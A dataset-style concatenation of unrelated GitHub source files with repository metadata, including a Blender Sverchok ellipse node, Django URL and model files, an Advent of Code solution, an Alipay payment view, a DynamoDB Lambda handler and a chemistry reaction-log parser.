self.rds_waiter.wait(DBInstanceIdentifier=self.instance_id)\n print(\n \"Successfully upgraded {} to: {}\".format(\n self.instance_id, self.engine_version\n )\n )\n","repo_name":"scottx611x/rds_auto_upgrader","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":2720,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"54"} +{"seq_id":"37778178540","text":"\nfrom math import sqrt\n\nfrom mathutils import Matrix\nimport bpy\nfrom bpy.props import FloatProperty, EnumProperty, BoolProperty\n\nfrom sverchok.node_tree import SverchCustomTreeNode\nfrom sverchok.data_structure import updateNode, zip_long_repeat, ensure_nesting_level\n\nfrom sverchok.utils.curve import SvEllipse\n\nclass SvEllipseCurveNode(SverchCustomTreeNode, bpy.types.Node):\n \"\"\"\n Triggers: Ellipse Curve\n Tooltip: Generate ellipse curve\n \"\"\"\n bl_idname = 'SvEllipseCurveNode'\n bl_label = 'Ellipse (Curve)'\n sv_icon = 'SV_ELLIPSE'\n\n mode_items = [(\"AB\", \"a b\", \"Major Radius / Minor Radius\", 1),\n (\"AE\", \"a e\", \"Major Radius / Eccentricity\", 2),\n (\"AC\", \"a c\", \"Major Radius / Focal Length\", 3)]\n\n centering_items = [(SvEllipse.F1, \"F1\", \"Ellipse focal point 1\", 1),\n (SvEllipse.CENTER, \"C\", \"Ellipse center point\", 2),\n (SvEllipse.F2, \"F2\", \"Ellipse focal point 2\", 3)]\n\n def update_mode(self, context):\n ''' Update the ellipse parameters of the new mode based on previous mode ones'''\n\n if self.mode == self.last_mode:\n return\n\n # from to\n switch_state = (self.last_mode, self.mode)\n\n a = self.major_radius\n e = self.eccentricity\n c = self.focal_length\n\n self.updating = True\n\n if switch_state == (\"AE\", \"AB\"):\n self.minor_radius = a * sqrt(1 - e * e)\n\n elif switch_state == (\"AC\", \"AB\"):\n c = min(a, c)\n self.minor_radius = sqrt(a * a - c * c)\n\n elif switch_state == (\"AB\", \"AE\"):\n b = min(a, self.minor_radius)\n self.eccentricity = sqrt(1 - (b * b) / (a * a))\n\n elif switch_state == (\"AC\", \"AE\"):\n self.eccentricity = c / a\n\n elif switch_state == (\"AB\", \"AC\"):\n b = min(a, self.minor_radius)\n self.focal_length = sqrt(a * a - b * b)\n\n elif switch_state == (\"AE\", \"AC\"):\n self.focal_length = a * e\n\n self.updating = False\n\n self.last_mode = self.mode\n self.update_sockets()\n updateNode(self, context)\n\n def update_ellipse(self, context):\n if self.updating:\n return\n\n updateNode(self, context)\n\n def update_sockets(self):\n if self.mode == \"AB\":\n socket2 = self.inputs[1]\n socket2.replace_socket(\"SvStringsSocket\", \"Minor Radius\").prop_name = \"minor_radius\"\n elif self.mode == \"AE\":\n socket2 = self.inputs[1]\n socket2.replace_socket(\"SvStringsSocket\", \"Eccentricity\").prop_name = \"eccentricity\"\n else: # AC\n socket2 = self.inputs[1]\n socket2.replace_socket(\"SvStringsSocket\", \"Focal Length\").prop_name = \"focal_length\"\n\n mode: EnumProperty(\n name=\"Mode\", items=mode_items,\n description=\"Ellipse definition mode\",\n default=\"AB\", update=update_mode)\n\n last_mode: EnumProperty(\n name=\"Mode\", items=mode_items,\n description=\"Ellipse definition last mode\",\n default=\"AB\")\n\n centering: EnumProperty(\n name=\"Centering\", items=centering_items,\n description=\"Center the ellipse around F1, C or F2\",\n default=SvEllipse.CENTER,\n update=updateNode)\n\n major_radius: FloatProperty(\n name='Major Radius', description='Ellipse major radius (semiaxis)',\n default=1.0, min=0.0, update=update_ellipse)\n\n minor_radius: FloatProperty(\n name='Minor Radius', description='Ellipse minor radius (semiaxis)',\n default=0.8, min=0.0, update=update_ellipse)\n\n eccentricity: FloatProperty(\n name='Eccentricity', description='Ellipse eccentricity',\n default=0.6, min=0.0, max=1.0, update=update_ellipse)\n\n focal_length: FloatProperty(\n name='Focal Length', description='Ellipse focal length. Distance from ellipse’s center to it’s focal points',\n default=0.6, min=0.0, update=update_ellipse)\n\n updating: BoolProperty(default=False) # used for disabling update callback\n\n def draw_buttons(self, context, layout):\n col = layout.column(align=True)\n row = col.row(align=True)\n row.prop(self, \"mode\", expand=True)\n row = col.row(align=True)\n row.prop(self, \"centering\", expand=True)\n\n def sv_init(self, context):\n self.width = 160\n self.inputs.new('SvStringsSocket', \"Major Radius\").prop_name = \"major_radius\" # 0\n self.inputs.new('SvStringsSocket', \"Minor Radius\").prop_name = \"minor_radius\" # 1\n self.inputs.new('SvMatrixSocket', \"Matrix\") # 2\n\n self.outputs.new('SvCurveSocket', \"Ellipse\")\n self.outputs.new('SvVerticesSocket', \"F1\")\n self.outputs.new('SvVerticesSocket', \"F2\")\n\n def process(self):\n outputs = self.outputs\n # return if no outputs are connected\n if not any(s.is_linked for s in outputs):\n return\n\n major_radius_s = self.inputs['Major Radius'].sv_get()\n input2_s = self.inputs[1].sv_get()# minor radius, eccentricity or focal length\n matrices_s = self.inputs['Matrix'].sv_get(default = [[Matrix()]])\n\n major_radius_s = ensure_nesting_level(major_radius_s, 2)\n input2_s = ensure_nesting_level(input2_s, 2)\n matrices_s = ensure_nesting_level(matrices_s, 2, data_types=(Matrix,))\n\n curves_out = []\n f1_out = []\n f2_out = []\n for major_radius_i, input2_i, matrices_i in zip_long_repeat(major_radius_s, input2_s, matrices_s):\n new_curves = []\n new_f1 = []\n new_f2 = []\n for major_radius, input2, matrix in zip_long_repeat(major_radius_i, input2_i, matrices_i):\n if self.mode == 'AB':\n minor_radius = input2\n elif self.mode == 'AE':\n e = input2\n minor_radius = major_radius * sqrt(1 - e*e)\n else: # AC\n c = input2\n a = major_radius\n minor_radius = sqrt(a*a - c*c)\n\n ellipse = SvEllipse(matrix, major_radius, minor_radius, center_type = self.centering)\n f1, f2 = ellipse.to_equation().focal_points()\n new_f1.append(f1)\n new_f2.append(f2)\n new_curves.append(ellipse)\n\n curves_out.append(new_curves)\n f1_out.append(new_f1)\n f2_out.append(new_f2)\n\n self.outputs['Ellipse'].sv_set(curves_out)\n self.outputs['F1'].sv_set(f1_out)\n self.outputs['F2'].sv_set(f2_out)\n\ndef register():\n bpy.utils.register_class(SvEllipseCurveNode)\n\ndef unregister():\n bpy.utils.unregister_class(SvEllipseCurveNode)\n\n","repo_name":"nortikin/sverchok","sub_path":"old_nodes/ellipse_curve.py","file_name":"ellipse_curve.py","file_ext":"py","file_size_in_byte":6743,"program_lang":"python","lang":"en","doc_type":"code","stars":2098,"dataset":"github-code","pt":"54"} +{"seq_id":"16130667161","text":"\"\"\"mySpartaSns URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/4.0/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. Add a URL to urlpatterns: path('', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Import the include() function: from django.urls import include, path\n 2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))\n\"\"\"\n\nfrom django.contrib import admin\nfrom django.urls import path, include\nfrom . import views # 현재 폴더에서 views 파일 가져온다.\n\n\nurlpatterns = [\n path('admin/', admin.site.urls),\n path('test/', views.base_response, name='first_test'), # test/ url로 views파일의 base_response 함수와 연결 시켜줌\n path('first/', views.first_view, name='first_view'),\n path('',include('user.urls')), # user의 url과 mySparta의 url 을 연결해줌\n path('',include('tweet.urls')), # user.urls 는 일치하는 url이 없고 tweet.urls가 응답\n]\n","repo_name":"mankic/mySpartaSNS","sub_path":"mySpartaSns/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1211,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"7097528731","text":"import os\r\n\r\nIMG_BASE_PATH='imgs/'\r\nelementFloderList=['aether', 'air', 'darkness', 'death', 'entropy', 'fire', 'earth',\r\n 'gravity','life', 'ligth', 'time', 'water', 'other']\r\nCARD_FILE='cards.txt'\r\nIMG_NAME_COL=0\r\n\r\ncardList=[]\r\n##get card name by img's name\r\nchildFiles=os.listdir(IMG_BASE_PATH)\r\nprint(childFiles)\r\nfor i in childFiles:\r\n p=IMG_BASE_PATH+i\r\n if os.path.isdir(p) and i in elementFloderList:\r\n cardList+=os.listdir(p)\r\n\r\n##print(cardList)\r\n\r\n\r\nexist_cardList=[]\r\n##get card.txt file exist name\r\nfile=open(CARD_FILE, 'r')\r\nfile.readline()\r\nwhile True:\r\n ss=file.readline()\r\n ss=ss.strip('\\n')\r\n if ss=='':\r\n break\r\n arr=ss.split('\\t')\r\n exist_cardList.append(arr[IMG_NAME_COL])\r\n\r\nfile.close()\r\n##print(exist_cardList)\r\n\r\n\r\n## rewrite the file append\r\nfile=open(CARD_FILE, 'a')\r\nfor name in cardList:\r\n if name not in exist_cardList:\r\n file.write(name+'\\n')\r\n ##print('')\r\n\r\nfile.close()\r\n\r\n\r\n\r\n\r\n","repo_name":"ppppdm/element_the_game","sub_path":"reloadImgName.py","file_name":"reloadImgName.py","file_ext":"py","file_size_in_byte":969,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"15219687896","text":"from django.contrib.gis.db import models\nfrom apps.common.models import AbstractFeature, AbstractObservation\n\n\nclass SamplingFeature(AbstractFeature):\n geometry = models.PointField(\n help_text=\"Spatial information about feature.\",\n srid=3857\n )\n\n\nclass Observation(AbstractObservation):\n feature_of_interest = models.ForeignKey(\n SamplingFeature,\n help_text=\"Watercourse station where the observation was taken.\",\n related_name='observations',\n editable=False,\n on_delete=models.DO_NOTHING\n )\n\n class Meta:\n get_latest_by = 'phenomenon_time_range'\n ordering = ['-phenomenon_time_range', 'feature_of_interest', 'procedure',\n 'observed_property']\n # unique_together see migration 0005 and 0006, index ozp_observation_uniq\n\n","repo_name":"gis4dis/poster","sub_path":"apps/processing/huaihe/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":825,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"54"} +{"seq_id":"23986228430","text":"import json\n\nclass Worker(object):\n def __init__(self, w_id, name=\"\", skill_levels={}):\n self.id=w_id\n self.name=name\n self.skill_levels=skill_levels\n\n\nclass Job(object):\n def __init__(self, j_id, name=\"\", std_time=0.0, need_machine=None, need_skill=None, count=1):\n self.id=j_id\n self.name=name\n self.std_time=std_time\n self.need_machine=need_machine\n self.need_skill=need_skill\n self.count=count\n\n\nclass Machine(object):\n def __init__(self, name):\n self.name=name\n self.job_list=[]\n\n def relate_to_job(self, job):\n self.job_list.append(job)\n\n\nclass Pipeline(object):\n def __init__(self, name=\"\"):\n self.name=name\n\n self.components=[]\n\n self.machines={}\n\n def __str__(self):\n return str(self.to_dict())\n\n def __repr__(self):\n self.__str__()\n\n def append_components(self, component):\n self.components.append(component)\n\n def from_dict(self, pl):\n self.name=pl[\"name\"]\n for component in pl[\"components\"]:\n component_id=component[\"id\"]\n new_component=Component(component_id, component[\"name\"])\n for group in component[\"groups\"]:\n group_id=group[\"id\"]\n new_group=Group(group_id, group[\"name\"])\n for job in group[\"jobs\"]:\n new_job=Job(job[\"id\"],job[\"name\"],job[\"std_time\"],job[\"need_machine\"],job[\"need_skill\"],job[\"count\"])\n if job[\"need_machine\"] not in self.machines:\n self.machines[job[\"need_machine\"]]=Machine(job[\"need_machine\"])\n self.machines[job[\"need_machine\"]].relate_to_job(job)\n new_group.append_job(new_job)\n new_component.append_group(new_group)\n self.append_components(new_component)\n\n\n def to_dict(self):\n pl={\n \"name\":self.name,\n \"components\":[]\n }\n for component in self.components:\n component_dic={\n \"id\":component.id,\n \"name\":component.name,\n \"groups\":[]\n }\n for group in component.groups:\n group_dic={\n \"id\":group.id,\n \"name\":group.name,\n \"jobs\":[]\n }\n for job in group.jobs:\n job_dic={\n \"id\":job.id,\n \"name\":job.name,\n \"count\":job.count,\n \"std_time\":job.std_time,\n \"need_machine\":job.need_machine,\n \"need_skill\":job.need_skill\n }\n group_dic[\"jobs\"].append(job_dic)\n component_dic[\"groups\"].append(group_dic)\n pl[\"components\"].append(component_dic)\n return pl\n\n def to_json(self):\n return json.dumps(self.to_dict(), ensure_ascii=False)\n\n def to_table(self):\n pass\n\n\nclass Component(object):\n def __init__(self, c_id, name, groups=[]):\n self.id=c_id\n self.name=name\n self.groups=groups\n \n def append_group(self, group):\n self.groups.append(group)\n\n\nclass Group(object):\n def __init__(self, g_id, name, jobs=[]):\n self.id=g_id\n self.name=name\n self.jobs=jobs\n \n def append_job(self, job):\n self.jobs.append(job)\n\n \t\n \n\nif __name__==\"__main__\":\n with open(\"pipeline_sample.json\", \"r\") as fp:\n pl_dic=json.load(fp)\n pl=Pipeline(pl_dic[\"name\"])\n pl.from_dict(pl_dic)\n print(pl)","repo_name":"Akaisorani/Pipeline-line-balancing","sub_path":"objects_notused.py","file_name":"objects_notused.py","file_ext":"py","file_size_in_byte":3637,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"31573567045","text":"#!/usr/bin/env python3\n\"\"\"Template for Advent of Code solution in Python.\n\nUsage: ./solution.py 1|2 FILE\n\n\"\"\"\n\nfrom __future__ import annotations\n\nimport re\nimport sys\nfrom argparse import ArgumentParser\nfrom collections import deque\nfrom dataclasses import dataclass\nfrom pathlib import Path\n\nverbose = False\n\n\n@dataclass\nclass Instruction:\n quantity: int\n source: int\n destination: int\n\n @classmethod\n def load(cls, value: str) -> Instruction:\n match = re.match(r\"^move (\\d+) from (\\d) to (\\d)\", value)\n return Instruction(\n quantity=int(match[1]),\n source=int(match[2]),\n destination=int(match[3]),\n )\n\n\n@dataclass\nclass SupplyYard:\n stacks: dict[int, deque[str]]\n\n def process1(self, instruction: Instruction):\n for i in range(instruction.quantity):\n crate = self.stacks[instruction.source].pop()\n self.stacks[instruction.destination].append(crate)\n\n def process2(self, instruction: Instruction):\n crates = []\n for i in range(instruction.quantity):\n crates.append(self.stacks[instruction.source].pop())\n self.stacks[instruction.destination].extend(reversed(crates))\n\n def top_row(self) -> str:\n return \"\".join(stack[-1] for stack in self.stacks.values())\n\n @classmethod\n def load(cls, value: str) -> SupplyYard:\n lines = value.splitlines()\n stack_labels = [int(label) for label in lines[-1].split()]\n stacks = {label: deque() for label in stack_labels}\n\n for line in reversed(lines[:-1]):\n for label, stack in stacks.items():\n index = 1 + 4 * (label - 1)\n try:\n crate = line[index].strip()\n except IndexError:\n continue\n if crate:\n stack.append(crate)\n return SupplyYard(stacks)\n\n\ndef main():\n parser = ArgumentParser()\n parser.add_argument(\"part\", type=int)\n parser.add_argument(\"filename\")\n parser.add_argument(\"--verbose\", \"-v\", action=\"store_true\")\n\n global verbose\n args = parser.parse_args()\n filename = args.filename\n if args.verbose:\n verbose = True\n\n if args.part == 1:\n part1(filename)\n elif args.part == 2:\n part2(filename)\n else:\n return f\"Invalid 'part' specified: {args.part}\"\n\n\ndef part1(filename):\n supply_yard, instructions = read_file(filename)\n if verbose:\n print(supply_yard, instructions)\n\n for instruction in instructions:\n supply_yard.process1(instruction)\n\n print(supply_yard.top_row())\n\n\ndef part2(filename):\n supply_yard, instructions = read_file(filename)\n for instruction in instructions:\n supply_yard.process2(instruction)\n\n print(supply_yard.top_row())\n\n\ndef read_file(filename) -> tuple[SupplyYard, list[Instruction]]:\n data = Path(filename).read_text()\n stack_data = \"\"\n process_instructions = False\n instructions = []\n supply_yard = None\n\n for line in data.splitlines(keepends=True):\n if line.strip() == \"\":\n process_instructions = True\n supply_yard = SupplyYard.load(stack_data)\n continue\n elif not process_instructions:\n stack_data += line\n continue\n else:\n instructions.append(Instruction.load(line.strip()))\n\n return supply_yard, instructions\n\n\nif __name__ == \"__main__\":\n sys.exit(main())\n","repo_name":"smsearcy/advent-of-code","sub_path":"2022/day05.py","file_name":"day05.py","file_ext":"py","file_size_in_byte":3463,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"16524278720","text":"\"\"\"Common interfaces for algorithms\"\"\"\n\nfrom abc import ABC, abstractmethod\nfrom typing import Callable\n\nfrom torch import Tensor\n\n\nclass IInterpolator(ABC):\n \"\"\"Interpolates/extrapolates values on regular grid in voxel coordinates\"\"\"\n\n @abstractmethod\n def __call__(self, volume: Tensor, coordinates: Tensor) -> Tensor:\n \"\"\"Interpolate\n\n Args:\n volume: Tensor with shape (batch_size, *channel_dims, dim_1, ..., dim_{n_dims})\n coordinates: Tensor with shape (batch_size, n_dims, *target_shape)\n\n Returns: Tensor with shape (batch_size, *channel_dims, *target_shape)\n \"\"\"\n\n\nclass IFixedPointSolver(ABC):\n \"\"\"Interface for fixed point solvers\"\"\"\n\n @abstractmethod\n def solve(\n self,\n fixed_point_function: Callable[[Tensor], Tensor],\n initial_value: Tensor,\n ) -> Tensor:\n \"\"\"Solve fixed point problem\n\n Args:\n fixed_point_function: Function to be iterated\n initial_value: Initial iteration value\n\n Returns: Solution of the fixed point iteration\n \"\"\"\n\n\nclass IFixedPointStopCriterion(ABC):\n \"\"\"Defines stopping criterion for fixed point iteration\"\"\"\n\n @abstractmethod\n def should_stop_after(\n self, previous_iteration: Tensor, current_iteration: Tensor, iteration_to_end: int\n ) -> bool:\n \"\"\"Return whether iterating should be stopped at end of an iteration\n\n After initial guess iteration == 0\n \"\"\"\n\n @abstractmethod\n def should_stop_before(self, iteration_to_start: int) -> bool:\n \"\"\"Return whether iterating should be continued at beginning of an iteration\n\n After initial guess iteration == 0\n \"\"\"\n","repo_name":"honkamj/SITReg","sub_path":"src/algorithm/interface.py","file_name":"interface.py","file_ext":"py","file_size_in_byte":1709,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"71784280802","text":"from rest_framework.views import APIView\nfrom alipay import AliPay\nfrom django.conf import settings\nfrom order.models import Order\nfrom rest_framework.response import Response\nfrom rest_framework import status\nfrom datetime import datetime\nfrom coupon.models import UserCoupon\nfrom django.db import transaction\nfrom users.models import UserCourse\nfrom courses.models import CourseExpire\nfrom users.models import User\nimport logging\n\nlog = logging.getLogger(\"django\")\n\n\nclass AlipayAPIView(APIView):\n def post(self, request, order_number):\n \"\"\"生成支付宝支付链接的地址\"\"\"\n # 接受订单信息\n try:\n # order_status=0 表示未支付宝\n order = Order.objects.get(order_number=order_number, order_status=0)\n except Order.DoesNotExist:\n return Response({\"message\": \"对不起当前订单不存在或者已经支付了!\"}, status=status.HTTP_400_BAD_REQUEST)\n\n # 创建支付宝的sdk对象\n alipay = AliPay(\n appid=settings.ALIPAY_CONFIG[\"appid\"],\n app_notify_url=settings.ALIPAY_CONFIG[\"app_notify_url\"], # 默认回调url\n app_private_key_path=settings.ALIPAY_CONFIG[\"app_private_key_path\"],\n # 支付宝的公钥,验证支付宝回传消息使用,不是你自己的公钥,\n alipay_public_key_path=settings.ALIPAY_CONFIG[\"alipay_public_key_path\"],\n sign_type=settings.ALIPAY_CONFIG[\"sign_type\"], # RSA 或者 RSA2\n debug=settings.ALIPAY_CONFIG[\"debug\"], # 默认False\n )\n\n # 电脑网站支付,需要跳转到https://openapi.alipay.com/gateway.do? + order_string\n order_string = alipay.api_alipay_trade_page_pay(\n out_trade_no=order.order_number, # 订单号\n total_amount=float(order.real_price), # 订单总金额[单位:元]\n subject=order.order_title, # 订单标题\n return_url=settings.ALIPAY_CONFIG[\"return_url\"], # 同步通知地址\n notify_url=settings.ALIPAY_CONFIG[\"notify_url\"], # 异步通知地址\n )\n\n pay_url = settings.ALIPAY_CONFIG[\"gateway_url\"] + order_string\n\n return Response({\"pay_url\": pay_url})\n\n\nclass AlipayResultAPIView(APIView):\n \"\"\"\n 支付宝支付结果的通知处理\n \"\"\"\n\n def get(self, request):\n # for rest_framework users\n data = request.query_params.dict()\n return self.result(data)\n\n def post(self, request):\n \"\"\"处理异步通知结果\n 1. 线下开发是不起作用的,因为外网的支付宝服务器无法访问我们的局域网地址\n 2. 如果使用了代理服务器,通过代理方式提供对外访问时,异步通知会在转发请求的过程中存在丢失数据的可能\n \"\"\"\n data = request.data.dict()\n return self.result(data)\n\n def result(self, data):\n signature = data.pop(\"sign\")\n\n # 创建支付宝的sdk对象\n alipay = AliPay(\n appid=settings.ALIPAY_CONFIG[\"appid\"],\n app_notify_url=settings.ALIPAY_CONFIG[\"app_notify_url\"], # 默认回调url\n app_private_key_path=settings.ALIPAY_CONFIG[\"app_private_key_path\"],\n # 支付宝的公钥,验证支付宝回传消息使用,不是你自己的公钥,\n alipay_public_key_path=settings.ALIPAY_CONFIG[\"alipay_public_key_path\"],\n sign_type=settings.ALIPAY_CONFIG[\"sign_type\"], # RSA 或者 RSA2\n debug=settings.ALIPAY_CONFIG[\"debug\"], # 默认False\n )\n\n # verification\n success = alipay.verify(data, signature)\n if success:\n\n # 修改订单状态\n out_trade_no = data.get(\"out_trade_no\")\n try:\n order = Order.objects.get(order_number=out_trade_no, order_status=0)\n except Order.DoesNotExist:\n return Response({\"message\": \"对不起当前订单不存在或者已经支付了!\"}, status=status.HTTP_400_BAD_REQUEST)\n\n with transaction.atomic():\n # 记录事务的回滚点\n save_id = transaction.savepoint()\n\n order.order_status = 1\n order.pay_time = datetime.now()\n order.save()\n\n # 如果订单中使用了优惠券,则优惠券的使用状态要调整\n if order.coupon > 0:\n user_coupon_id = order.coupon\n try:\n user_coupon = UserCoupon.objects.get(pk=user_coupon_id, is_use=False)\n user_coupon.is_use = True\n user_coupon.save()\n\n except UserCoupon.DoesNotExist:\n log.error(\"生成订单支付结果有误!优惠券发生异常!\")\n transaction.savepoint_rollback(save_id)\n\n # 如果用户使用了积分,则扣除相应积分\n user = User.objects.get(pk=order.user_id)\n if order.credit > 0:\n user.credit = user.credit - order.credit\n if user.credit > 0:\n user.save()\n else:\n log.error(\"生成订单支付结果有误!积分计算有误!\")\n transaction.savepoint_rollback(save_id)\n\n # 记录用户购买商品的记录信息\n order_course = order.order_courses.all()\n course_list = []\n for item in order_course:\n\n # 获取本次购买课程的有效期选项\n try:\n \"\"\"有效期选项\"\"\"\n course_expire = CourseExpire.objects.get(expire_time=item.expire, course=item.course)\n expire = course_expire.expire_time\n timer = expire * 24 * 60 * 60\n out_timestamp = order.pay_time.timestamp() + timer\n # 把数值时间戳转变成日期对象\n out_time = datetime.fromtimestamp(out_timestamp)\n\n except CourseExpire.DoesNotExist:\n \"\"\"永久有效,默认过期时间200年后\"\"\"\n out_time = \"2199-01-01 00:00:00\"\n\n \"\"\"\n 判断之前当前用户是否购买过同一商品,如果购买了同一商品,则在前面的过期时间基础上增加时间\n 过期时间,也需要判断,如果现在已经过期了,则购买完课程以后的过期时间 = 现在 + 有效期\n 如果现在没有过期,则购买完课程以后的过期时间 = 过期时间 + 有效期\n\n 购买完成,我们扣除了积分,但是我们也要针对本次消费的积分进行积分流水记录! Credit\n \"\"\"\n UserCourse.objects.create(\n user=user,\n course=item.course,\n trade_no=data.get(\"trade_no\"),\n buy_type=1,\n pay_time=order.pay_time,\n out_time=out_time,\n orders=0,\n\n )\n course_list.append({\n \"id\": item.course.id,\n \"name\": item.course.name\n })\n\n data = {\n \"order_number\": order.order_number,\n \"pay_time\": order.pay_time,\n \"real_price\": order.real_price,\n \"user_credit\": user.credit,\n \"course_list\": course_list,\n }\n\n return Response(data)\n\n else:\n return Response({\"message\": \"支付失败!\"}, status=status.HTTP_500_INTERNAL_SERVER_ERROR)\n","repo_name":"jikezc/luffy","sub_path":"luffyapi/luffyapi/apps/payments/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":7870,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"41879610713","text":"import libreria\r\n#1. Implementacion de submenu\r\ndef agregarCostototal():\r\n #1 agregamos el costo fijo\r\n #2 agregamos el costo variable\r\n #3 hallamos el costo total\r\n costo_fijo=libreria.pedir_numero(\"ingrese costo fijo\",3,30)\r\n costo_variable=libreria.pedir_numero(\"ingrese costo variable\",2,50)\r\n print(\"ingrese el costo total\", costo_fijo+costo_variable)\r\ndef agregarCostofijo():\r\n #1 agregar el costo total\r\n #2 agregar el costo variable\r\n #3 calcular el costo fijo\r\n costo_total=libreria.pedir_numero(\"ingrese costo total\",60,120)\r\n costo_variable=libreria.pedir_numero(\"ingrese costo variable\",2,45)\r\n print(\"ingrese el costo fijo \",costo_total-costo_variable )\r\n# Menu de comandos\r\nopc=0\r\nmax=3\r\nwhile(opc!= max):\r\n print(\"############### MENU ##############\")\r\n print(\"#1. agregar costo total\")\r\n print(\"#2. agregar costo fijo\")\r\n print(\"#3. Salir \")\r\n #2. Eleccion de la opcion menu\r\n opc=libreria.pedir_numero(\"Ingreso la opcion:\", 1, 3)\r\n #3. Mapeo de las opciones\r\n if (opc==1):\r\n agregarCostototal()\r\n if (opc==2):\r\n agregarCostofijo()\r\n","repo_name":"helbertsandoval/trabajo10_sandoval-sanchez-helbert_cesar_maira_paz","sub_path":"submenu7.py","file_name":"submenu7.py","file_ext":"py","file_size_in_byte":1126,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"18121296745","text":"import boto3\nfrom botocore.exceptions import BotoCoreError, ClientError\n\ndef lambda_handler(event, context):\n dynamodb = boto3.resource('dynamodb')\n table = dynamodb.Table('cloud9_table')\n\n try:\n response = table.put_item(\n Item={\n 'id': event['id'],\n 'name': event['name'],\n # Add as many attributes as you want\n }\n )\n return {\n 'statusCode': 200,\n 'body': 'Item added!'\n }\n except BotoCoreError as e:\n return {\n 'statusCode': 400,\n 'body': 'Error adding item: {}'.format(e.response['Error']['Message'])\n }\n","repo_name":"zackrylangford/fullstack-serverless","sub_path":"lambda-functions/putFunction.py","file_name":"putFunction.py","file_ext":"py","file_size_in_byte":673,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"71414165601","text":"import requests\nfrom pprint import pprint\nimport json\n\nURL = \"https://httpbin.org/put\"\nURL2 = \"https://httpbin.org/get\"\nURL3 = \"https://httpbin.org/delete\"\nr_put = requests.put(URL, data={'key': 'value'})\n\n# print(r_put.status_code)\n# # print(r_put.text)\n\n# r_option = requests.options(URL2)\n# print(type(r_option))\n# print(r_option.text)\n\n# pprint(r_option.headers)\n\nr_delete = requests.delete(URL3)\nprint(r_delete.status_code)\nprint(type(r_delete))\n\nprint(r_delete.text)","repo_name":"liberbell/py31","sub_path":"putoptions.py","file_name":"putoptions.py","file_ext":"py","file_size_in_byte":472,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"74006259682","text":"\"\"\"\nparse the rxn.log file to Rxn class, and do analysis\n@log: \n2014-06-23: fix the bug of sorting name\n\"\"\"\n\nfrom operator import itemgetter\n\nclass Mol():\n def __init__(self, line):\n self.id = 0\n self.natom = 0\n self.name = ''\n self.atoms = []\n self.line = line\n self.lifetime = 0\n self.parser()\n\n def parser(self,):\n tokens = self.line.strip().split()\n self.id = int(tokens[0])\n self.natom = int(tokens[1])\n self.name = tokens[2]\n self.atoms = [int(i) for i in tokens[3:]]\n\nclass Rxn():\n def __init__(self, line):\n self.nstep = 0\n self.id = 0\n self.nreac = 0\n self.npro = 0\n self.reac = []\n self.pro = []\n self.reacid = []\n self.proid = []\n self.reactag = \"\"\n self.reacidtag = \"\"\n self.line = line\n self.parser()\n\n def parser(self,):\n tokens = self.line.strip().split(None, 3)\n self.nstep = int(tokens[0].split(\"_\")[0])\n self.id = int(tokens[0].split(\"_\")[1])\n self.nreac = int(tokens[1])\n self.npro = int(tokens[2])\n reac = tokens[3].split(\"::\")[0].split(\"+\")\n reac2 = []\n for i in reac:\n for j in i.split():\n reac2.append(j)\n pro = tokens[3].split(\"::\")[1].split(\"+\")\n pro2 = []\n for i in pro:\n for j in i.split():\n pro2.append(j)\n\n for i in range(self.nreac):\n self.reac.append(reac2[2*i])\n self.reacid.append(int(reac2[2*i + 1].strip(\"()\")))\n\n for i in range(self.npro):\n self.pro.append(pro2[2*i])\n self.proid.append(int(pro2[2*i + 1].strip(\"()\")))\n \n # sor the name and id simutaniously\n self.reac, self.reacid = [list(x) for x in zip(*sorted(zip(self.reac, self.reacid), key=itemgetter(0)))]\n self.pro, self.proid = [list(x) for x in zip(*sorted(zip(self.pro, self.proid), key=itemgetter(0)))]\n \n self.reactag = \"_\" + \"_\".join(self.reac)\n self.reactag += \"_=_\"\n self.reactag += \"_\".join(self.pro) + \"_\"\n \n self.reacidtag = \"_\" + \"_\".join([str(i) for i in self.reacid])\n self.reacidtag += \"_=_\"\n self.reacidtag += \"_\".join([str(i) for i in self.proid]) + \"_\"\n\ndef parse_rxn():\n lines = []\n f = open(\"rxn.log\", \"r\")\n for i in f:\n if i.startswith(\"#\"):\n pass\n else:\n if len(i.strip()) > 0:\n lines.append(i)\n return lines\n\ndef parse_molid():\n lines = []\n f = open(\"molid.out\", \"r\")\n for i in f:\n if i.startswith(\"#\"):\n pass\n else:\n if len(i.strip()) > 0:\n lines.append(i)\n return lines\n \ndef output_molid_ext(mols):\n o = open(\"molid.ext\", \"w\")\n for i in mols:\n o.write(\"%6d\"%i.id)\n o.write(\"%6d\"%i.natom)\n o.write(\"%20s\"%i.name)\n o.write(\"%8d\"%i.lifetime)\n o.write(\"\\n\")\n o.close()\n \ndef main():\n pass\n \nif __name__ == \"__main__\":\n main()\n","repo_name":"esemble/simpy","sub_path":"tools/hun/rxn.py","file_name":"rxn.py","file_ext":"py","file_size_in_byte":3083,"program_lang":"python","lang":"en","doc_type":"code","stars":23,"dataset":"github-code","pt":"54"} 